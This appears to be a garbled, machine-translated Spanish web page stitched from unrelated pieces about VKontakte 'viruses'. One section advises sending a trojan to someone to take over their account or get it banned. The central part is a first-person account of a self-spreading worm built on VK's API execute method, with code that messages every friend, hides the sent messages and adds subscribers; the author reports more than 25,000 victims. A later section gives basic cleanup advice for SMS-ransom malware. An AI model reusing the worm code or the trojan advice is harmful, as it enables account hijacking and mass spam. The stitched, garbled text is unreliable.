Menú
Está libre
registro
hogar  /  Educación/ Virus en la página VK. Cómo deshacerse del virus VKontakte

Virus en la página de VK. Cómo deshacerse del virus VKontakte

Detener Continuar

Cantidad programas existentes obtener acceso a la cuenta de otra persona puede volver tu cabeza. Google y Yandex según los respectivos consulta de busqueda dar muchos enlaces, compitiendo entre sí para llamarse a sí mismos y prometer el más rápido, más camino seguro hackear VK sin virus. ¿Pero puedes confiar en ellos?

La mayoría de estas aplicaciones funcionan en tu contra. Una vez instalados en una computadora, instantáneamente disuelven sus tentáculos y roban sus contraseñas, solo imitando las actividades de piratería de terceros. cuenta... Por lo tanto, antes de apresurarse a instalar algo muy colorido y tentador, estudie cuidadosamente las revisiones del programa. La información veraz se oculta en las páginas lejanas de los motores de búsqueda.

Virus confiable para piratear el contacto de otro usuario

El omnipresente troyano se considera el virus más eficaz para piratear un contacto. Al igual que el mítico caballo de Troya, se crea confianza bajo la apariencia de otro programa. Creadores archivo malicioso utilice muchos trucos astutos, prometiendo encontrar vulnerabilidades, acelerar la computadora, emoticonos y pegatinas únicos. Este es un truco de VK muy simple e incluso algo ingenuo, pero, sorprendentemente, realmente funciona.

Envíe dicho virus a aquel cuya cuenta desea piratear. Y pronto obtendrá acceso a su página o se asegurará de que la administración de VKontakte bloquee su página. Una forma inteligente de vengarse.

Al día siguiente estaba sentado frente a la computadora y no sabía qué hacer. Al desplazarme por mi feed, ya he vuelto a las publicaciones de ayer, que ya he visto. Al ir a mi página pensé: “Dios, solo 160 suscriptores. Qué pequeño es ... ". Y surgió de inmediato la pregunta: "¿Cómo aumentarlos?" Está claro que una promoción vendrá a la mente de todos. Pero eso requería dinero o gastaba mucho tiempo registrándose, volviendo a publicar o que le gustara algo, esa no era la solución.

Más tarde, antes de acostarme, tuve una idea de cómo hacerlo. La idea era un enlace viral que obtendrían casi todos los internautas.

Al despertarme por la mañana y tomar café, comencé a implementar esta idea. Para muchos, no ha sido ningún secreto durante mucho tiempo que para ejecutar solicitudes en nombre de un usuario en la API de VK, es necesario tener su access_token. ¡Pero! Sobre el sitio en sí esta clave no es necesaria para simplemente probar. Antes de comenzar la creación de este Super Virus, solo quería probar su funcionalidad.

Para la prueba y usó el método amigos.add y en el campo user_id registré mi id. Después de hacer esto, la barra de direcciones cambiará a algo como esto:


Acorté este enlace a través de vk.cc y lo dejé en los comentarios a dos grupos populares con una descripción tentadora. Después de media hora, ya tenía 100 suscriptores (hubieran sido más, pero mi comentario fue eliminado y me banearon). Después de eso, me sentí seguro de que funcionaría y comencé a construirlo.

Vkontakte restringe el acceso a la API desde una IP a un intervalo de 5 segundos para que el servidor no se sobrecargue. Y para resolver el problema con solicitudes frecuentes, crearon un método ejecutar... Este método le permite llamar a varios métodos al mismo tiempo mientras guarda el algoritmo que utilicé.

Este virus se basa principalmente en la credulidad de las personas, en dos palabras: "ingeniería social". Cada uno de nosotros probablemente seguirá el enlace en el mensaje de su amigo: esto es lo que quería esclavizar al mundo y aprovecharme.

Me tomó alrededor de un día crear el virus, ya que encontré un par de obstáculos. Más sobre esto más adelante. Se suponía que el virus funcionaba así:

  1. El usuario siguió el enlace
  2. El método obtiene una lista de todos los amigos y los ordena por calificación.
  3. Envía un mensaje con el texto "Look / * link * /"
  4. El mensaje se elimina del remitente.
  5. Agrega a amigos y / o se suscribe a grupos específicos
  6. Los amigos que recibieron el mensaje siguen el enlace.
  7. Empezando desde el principio
Y así es como se ve este código en el método:

Var a = API.friends.get ((// Método para obtener una lista de todos los amigos "order": "hints" // Parámetro para ordenar por calificación)). Items; // Obtener solo la lista var b = 0; // Variable del bucle var d = 0; // Variable para id de mensaje while (a [b]) (d = API.messages.send ((// Método para enviar mensaje. Devuelve id de mensaje "user_id": a [b], // destinatario "mensaje": " Look / * link * / "// texto del mensaje)); API.messages.delete ((// Elimina un mensaje por su id" message_ids ": d)); b = b + 1; // Incrementa b en 1 ( ++ bo b ++ no funciona)) API.friends.add (("user_id": "mi id"));
Después de recibir el enlace, fui feliz a probarlo en mi perfil falso. Pero no estaba ahí. Siguiendo el enlace, me dio el error 12: Error de sintaxis. No se esperaba el carácter &. Aquí es donde comenzaron mis obstáculos.

Al final resultó que, el servidor traduce todos los caracteres para protegerse contra XML. Y la señal doble comillas"recién traducido a & quotes; y la consola
dio un error. Las comillas simples no se traducen, pero no las aceptará, ya que la sintaxis es de JSON.

Dado que este es mi primer intento de trabajar con una vulnerabilidad (como esta publicación), me tomó un poco más de tiempo. Se necesitaron las primeras cinco horas para comprender que las claves se pueden transferir sin comillas y que tampoco es necesario escribir números entre comillas. Aquellos. Puedes hacerlo:

API.friends.add ((user_id: 1234567));
De acuerdo, se ha resuelto la mitad del problema. Solo quedaba un problema: tenía que averiguar cómo pasar el texto del mensaje y la palabra "sugerencias" para ordenar.

¡Para referencia! ¿Por qué fue necesario pasar el parámetro de sugerencias?

El hecho es que incluso en la página de prueba del método, con una solicitud sospechosa (por ejemplo, envío de 3 o 7 mensajes), debe ingresar un captcha. No es el hecho de que el mensaje se enviará a la persona adecuada. Por lo tanto, pasar este parámetro ordenará la lista de modo que los tres primeros de la lista tengan un 90% más de probabilidades de seguir el enlace.


Para resolver el último problema, pensé en usar expresiones regulares o algo como, para reemplazar el número 0 en una cadena. Yo mismo soy un desarrollador web principiante y no sabía cómo hacer esto, e hice la pregunta en la tostadora. Habiendo recibido las dos respuestas que necesitaba con diferentes rutas de solución, inmediatamente decidí usarlas. Y aquí de nuevo el problema ...

La API de VK no es JavaScript y no admite funciones como replace () o toString (). Y, en general, no admite nada de JS, excepto var, return, while, if, else, matrices y operadores de comparación.

Una vez más me encontré en un callejón sin salida y no sabía qué hacer. Les conté a mis compañeros programadores sobre esto con una solicitud de ayuda. Con las palabras "¡Esto es simplemente brillante, amigo!" decidieron ayudarme y fueron a profundizar en la documentación de la API

Me tomó mucho tiempo pensar en cómo resolver este problema. Se hizo tarde y me fui a la cama. Antes de acostarme, volví a tener una gran idea con una solución a este problema.

Mañana de nuevo. Después de beber mi dosis de café de la mañana, lo primero que hice fue continuar con mi virus.
La solución fue bastante sencilla. Después de todo, al pasar números o variables de métodos, no es necesario que los escriba entre comillas.

Para mí, necesitaba mi perfil falso. Allí hice dos publicaciones diferentes con los siguientes textos:

  • Ver / * enlace * /
  • pistas
Todo lo que necesitaba era obtener estos registros y escribirlos en variables, lo cual hice. Como resultado, obtuve el siguiente código:

Var b = 0; // Variable del bucle var d = 0; // Variable para la identificación del mensaje var m = API.wall.get ((owner_id: id, // id de la página falsa count: 1 // devuelve solo 1 publicación)). Items.text; // obtener solo el texto del artículo var h = API.wall.get ((owner_id: id, // id de la página falsa count: 1, // devolver solo 1 post offset: 1 // mover publicaciones por 1) ). items.text; // obtener solo el texto del artículo var a = API.friends.get ((// Método para obtener una lista de todos los amigos order: h // Parámetro para ordenar por calificación)). items; // Obtener solo la lista while (a [b]) (d = API.messages.send ((// Método para enviar el mensaje. Devuelve el id del mensaje user_id: a [b], // mensaje del destinatario: m // message text)); API.messages.delete ((// Eliminar un mensaje por su id message_ids: d)); b = b + 1; // Aumentar b en 1 (++ b o b ++ no funciona )) API.friends.add (("user_id": "mi identificación"));
Habiendo recibido el enlace, lo comprobé para que funcionara y, ¡hurra! Todo funcionó como debería. Se envió una solicitud de amistad desde la página falsa y los mensajes se enviaron con éxito a los primeros 7 amigos de la calificación. Al apretar el enlace y ponerlo en la primera publicación, ¡me estaba preparando para el Big Boom con una sonrisa de satisfacción!

Para saber también cuántas personas siguieron el enlace, comprimí el enlace al archivo php en mi alojamiento, que registró la visita en la base de datos y lo redirigí al método con el código.

Por intriga, no actualicé la página cada vez, solo dejé VK justo después de un comentario. Regresé aproximadamente una hora después y, al ver la cantidad de registros en la base de datos, sentí una oleada de felicidad. ¡La alegría no conocía límites! Más de 5000 transiciones. “¡Y esto en solo una hora! ¿Y qué pasará en dos? " - se preguntó a sí mismo. Esta fue mi primera experiencia de pirateo.

Habiendo decidido ver cuánto acumulé personalmente en la página, fui al sitio y vi hasta 3 nuevos suscriptores. Por no decir que no me sorprendió. No entendí nada ... Había más de 5000 líneas en la base de datos, donde casi todos tenían una IP individual, y solo había 3 suscriptores. VK ya tiene protección. Con esos pensamientos, me fui para estar triste.

Ya han pasado 2 días. Antes de acostarme, decidí revisar mi sitio. Habiendo buscado en la base de datos, y por el bien del interés, miró la tabla para registrar estadísticas. Ya se han acumulado más de 25.000 visitas a través de un enlace viral, y el número de suscriptores ha disminuido, porque los que fueron una prueba para mí al principio también se dieron de baja.

Una vez más, antes de irme a la cama, finalmente entendí por qué no había nuevos suscriptores y el número de transiciones estaba creciendo (alguien, escriba una publicación, ¿por qué exactamente antes de la hora de dormir vienen las decisiones? De lo contrario, lo escribiré yo mismo).
Todo se trataba del código. El método de ejecución ejecuta el código conservando el algoritmo, y el método amigo estaba al final. No funcionó porque no se ejecutaron más métodos hasta que se ingresó el captcha. Porque todas mis "víctimas" tenían más de 8 amigos, por supuesto que el captcha funcionó, y los usuarios, sospechando algo, simplemente cerraron la pestaña. Se guardó el registro, se transmitieron mensajes y no hubo más esclavos de suscriptores.

Inmediatamente saltando de la cama, decidí arreglarlo rápidamente, de modo que por la mañana ya había más de diez mil suscriptores. Después de hacer un cambio a archivo php reenvío de llamadas, me fui a la cama con pensamientos felices de mañana.

Llega la mañana y reviso mi perfil sin siquiera tomarme el café. ¡Hurra! Hay menos suscriptores ...
Una vez más, me sorprendió mucho. Todavía debería funcionar. Esta vez decidí probar la funcionalidad del enlace en el perfil real. Después de borrar el código, borrar el mensaje, seguí el enlace generado. Resulta que los desarrolladores ya han cerrado esta vulnerabilidad. Código en Barra de dirección en la transición ya no funcionó

No sé cómo lo descubrieron ellos mismos. ¡Soy un genio aquí! O el mensaje les llegó, o uno de los programadores que conocían les habló en secreto sobre la vulnerabilidad, de modo que yo nunca me enteraría.

De todos modos me alegré, ya que por primera vez pude encontrar una vulnerabilidad en gran red... Puede que sea algo común para otros, pero para mí fue algo especial.

Etiquetas: vkontakte api, vulnerabilidades, ingeniería social

¿Qué hacer si, al abrir su página de VKontakte, aparece un mensaje sobre una violación de los términos de uso, bloqueo de cuenta y una oferta para recibir un código de activación después de enviar un mensaje SMS? O simplemente es imposible visitar su sitio favorito sin ninguna "demanda de rescate". Lo principal para recordar en este momento es que el sitio web de VKontakte es absolutamente gratuito y no requiere envío SMS de pago mensajes. Y en segundo lugar, la computadora está infectada con software malicioso y están tratando de sacar dinero de su billetera. El envío de SMS aún no garantiza una solución al problema y su costo puede diferir significativamente del declarado.

¿Cómo se infecta la computadora? Como regla general, el propio usuario pone en peligro su sistema al establecer la "izquierda" software o haciendo clic en un enlace a sitios sospechosos. Como resultado, un virus ingresa a la computadora.

Las principales formas de eliminar el virus VKontakte:

  1. Restauración del sistema. La forma más fácil. En este caso, todos los parámetros del sistema se revierten a la fecha en que la computadora aún no estaba infectada. Se hace simplemente: a través del botón "Inicio", seleccione "Programas"> "Accesorios"> "Herramientas del sistema"> "Restaurar sistema".
  2. Editando el archivo de hosts, que cubriremos con más detalle más adelante.
  3. Si archivo hosts clean, puede intentar usar un navegador diferente. Algunos virus "se adhieren" sólo al navegador y cambiarlo ayudará a resolver el problema. Si usa el estándar explorador de Internet luego intente instalar Chrome o Mozilla Firefox.
  4. Escanee su computadora con el último antivirus. Adecuado para esto utilidades gratuitas Avptool, Dr.Web CureIt! o Anti-Malware de Malwarebytes. El uso de la última utilidad a menudo le permite corregir la situación y abrir el acceso a sitios cerrados.
  5. Si los procedimientos anteriores no ayudan, comuníquese con un especialista. Suponemos que no está tan versado en registros, Procesos corriendo para empezar a editarlos y editarlos.
  6. Reinstalación del sistema. Un método cardinal pero poderoso. Déjelo como "último mecenas".

¿Cómo edito el archivo de hosts yo mismo?

Debido al hecho de que editar el archivo de hosts es una de las formas más comunes de lidiar con VKontakte, sugerimos instrucciones paso a paso para editarlo. A pesar de que tienes que "encender el cerebro" un poco, no hay nada de malo en editar el archivo de hosts. Qué es este archivo y cómo se usa, los más curiosos pueden leerlo por su cuenta, por ejemplo, en Wikipedia.

Entonces, aquí hay un esquema simple de acciones adecuado para todos los sistemas operativos(XP, Vista y Win 7):

  1. Cargamos la computadora en modo seguro con derechos de administrador (mantenga presionada la tecla F8 durante el arranque, luego seleccione el elemento "Modo seguro" en el menú que aparece). Si tiene dificultades para acceder al modo seguro, pruébelo como está.
  2. Seguimos a C: \ WINDOWS \ system32 \ drivers \ etc \ y buscando un archivo llamado hosts. Si el archivo no está visible, hacemos visibles los archivos ocultos y del sistema ("Panel de control"> "Opciones de carpeta"> "Ver" - marque la casilla junto a "Mostrar archivos ocultos y del sistema"). ¡Atención! El archivo de hosts no debe tener extensiones. Ábralo con el Bloc de notas (Botón derecho del mouse> Abrir con> Bloc de notas) y estúdielo. Solo debe incluirse una entrada del formulario "127.0.0.1 localhost" debajo de los signos #. Eliminamos todos los demás registros. Y por supuesto guardamos todos los cambios. Reiniciamos la computadora.

Y finalmente, algunos consejos sobre cómo evitar infectar su computadora con el virus VKontakte:

  1. No dé sus contraseñas de VKontakte a nadie. Si es posible, almacene las contraseñas en forma encriptada utilizando un software especializado. No utilice datos personales, el nombre del perro, la palabra "contraseña", etc. en la contraseña.
  2. No responda a cartas de la administración de la red social. No es necesario. Por lo general, estos correos electrónicos provienen de spammers y usuarios malintencionados.
  3. Utilice antivirus con bases de datos actualizadas.
  4. No instale software cuestionable en su computadora.

Hay muchas otras recomendaciones, pero en la inmensa mayoría de los casos, son suficientes. Los métodos descritos anteriormente para eliminar virus son adecuados no solo para el sitio web de VKontakte, sino también para otras redes sociales y recursos visitados con frecuencia.

Existe una cantidad bastante grande de amenazas informáticas, cuyo propósito es derrotar redes sociales... La mayoría vívido ejemplo, este es un requisito para enviar un SMS a un número de pago cuando intentas ingresar a la página. Si ve ese mensaje, entonces necesita eliminar el virus VKontakte.

Averigüemos cómo hacer esto.

¿Cómo se ve la amenaza?

Cuando intenta ir a su página, puede ver la siguiente imagen.

Deshagámonos de esto.

Usamos una utilidad antivirus.

Https://free.drweb.ru/download+cureit+free/?lng=ru

Instalar y ejecutar. Es recomendable hacer esto en modo seguro y apagar Internet durante el análisis.

La ventana de inicio se ve así.

Haga clic en el botón "Iniciar pago" y ejecute un escaneo completo de su computadora. Todas las amenazas encontradas deben curarse o eliminarse.

Después de eso necesitas despejar archivo de sistema Hospedadores. Se encuentra a lo largo del siguiente camino:

C: \ Windows \ System32 \ drivers \ etc

Vaya a esta carpeta y ábrala con el bloc de notas. Compruebe si hay entradas extrañas. Y quítelos, si los hay.

Después de eso, reinicie su computadora e intente ir a su página en VK.

¿Preguntas?

En contacto con